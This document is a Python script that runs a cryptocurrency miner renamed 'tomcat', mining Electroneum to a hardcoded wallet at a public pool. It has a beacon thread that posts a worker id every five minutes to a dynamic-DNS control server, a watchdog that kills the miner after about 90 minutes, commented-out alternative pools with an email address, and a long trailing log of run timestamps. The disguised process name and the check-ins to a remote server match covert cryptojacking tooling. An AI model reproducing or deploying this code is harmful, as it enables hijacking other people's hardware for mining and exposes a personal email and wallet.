import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:54:01.268559
#2018-02-17 17:41:06.433441
#2018-02-17 19:28:07.445955
#2018-02-17 21:19:05.861218
#2018-02-17 23:03:01.762514
#2018-02-18 00:50:06.833355
#2018-02-18 02:38:01.891298
#2018-02-18 04:24:03.506987
#2018-02-18 06:16:06.769697
#2018-02-18 08:06:08.004241
#2018-02-18 09:53:06.957262
#2018-02-18 11:40:05.721485
#2018-02-18 13:25:07.427374
#2018-02-18 15:15:07.136066
#2018-02-18 17:04:06.908015
#2018-02-18 18:51:06.060291
#2018-02-18 20:38:05.757572
#2018-02-18 22:24:05.196115
#2018-02-19 00:13:01.282423
#2018-02-19 01:58:05.107895
#2018-02-19 03:44:07.779727
#2018-02-19 05:30:09.874548
#2018-02-19 07:18:02.145272
#2018-02-19 09:06:08.451583
#2018-02-19 10:54:08.036746
#2018-02-19 12:43:06.714697
#2018-02-19 14:31:07.696513
#2018-02-19 16:18:08.004058
#2018-02-19 18:05:10.365847
#2018-02-19 19:51:04.373628
#2018-02-19 21:40:07.089761
#2018-02-19 23:26:06.685803
#2018-02-20 01:12:05.969986
#2018-02-20 03:03:07.038369
#2018-02-20 04:51:03.902372
#2018-02-20 06:34:01.932307
#2018-02-20 08:19:03.561036
#2018-02-20 10:04:06.543306
#2018-02-20 11:49:09.884368
#2018-02-20 13:37:08.933535
#2018-02-20 15:21:07.779371
#2018-02-20 17:07:11.733245
#2018-02-20 18:57:02.112249
#2018-02-20 20:47:08.874105
#2018-02-20 22:30:08.560581
#2018-02-21 00:11:07.790368
#2018-02-21 01:56:01.467799
#2018-02-21 03:45:01.943001
#2018-02-21 05:34:07.110623
#2018-02-21 07:22:07.800434
#2018-02-21 09:07:06.962510
#2018-02-21 10:56:06.779351
#2018-02-21 12:44:01.451208
#2018-02-21 14:32:07.140884
#2018-02-21 16:19:05.469286
#2018-02-21 18:11:02.230831
#2018-02-21 19:57:04.166213
#2018-02-21 21:44:01.492459
#2018-02-21 23:33:06.599860
#2018-02-22 01:21:06.899968
#2018-02-22 03:09:07.444487
#2018-02-22 04:54:06.236024
#2018-02-22 06:39:01.793128
#2018-02-22 08:28:07.037087
#2018-02-22 10:15:08.931354
#2018-02-22 12:00:05.114685
#2018-02-22 13:46:07.181780
#2018-02-22 15:36:04.331963
#2018-02-22 17:21:05.203087
#2018-02-22 19:09:08.663783
#2018-02-22 21:02:08.254694
#2018-02-22 22:48:06.695132
#2018-02-23 00:35:01.383032
#2018-02-23 02:23:01.700944
#2018-02-23 04:13:05.537803
#2018-02-23 05:59:06.005844
#2018-02-23 07:32:04.886973
#2018-02-23 09:34:07.760908
#2018-02-23 11:18:04.674418
#2018-02-23 12:35:11.329331
#2018-02-23 14:00:05.162276
#2018-02-23 15:36:02.191211
#2018-02-23 17:08:04.859713
#2018-02-23 18:43:07.282822
#2018-02-23 20:18:07.315496
#2018-02-23 21:49:06.748198
#2018-02-23 23:26:04.160110
#2018-02-24 00:54:04.095061
#2018-02-24 02:44:02.097073
#2018-02-24 05:28:05.734848
#2018-02-24 07:15:02.605265
#2018-02-24 09:06:06.349697
#2018-02-24 10:42:07.214473
#2018-02-24 12:26:03.855070
#2018-02-24 14:06:03.988235
#2018-02-24 15:42:07.061613
#2018-02-24 17:20:09.521810
#2018-02-24 18:54:05.439130
#2018-02-24 20:25:05.952052
#2018-02-24 21:56:03.868940
#2018-02-25 00:40:10.023516
#2018-02-25 02:41:07.085749
#2018-02-25 06:25:08.079854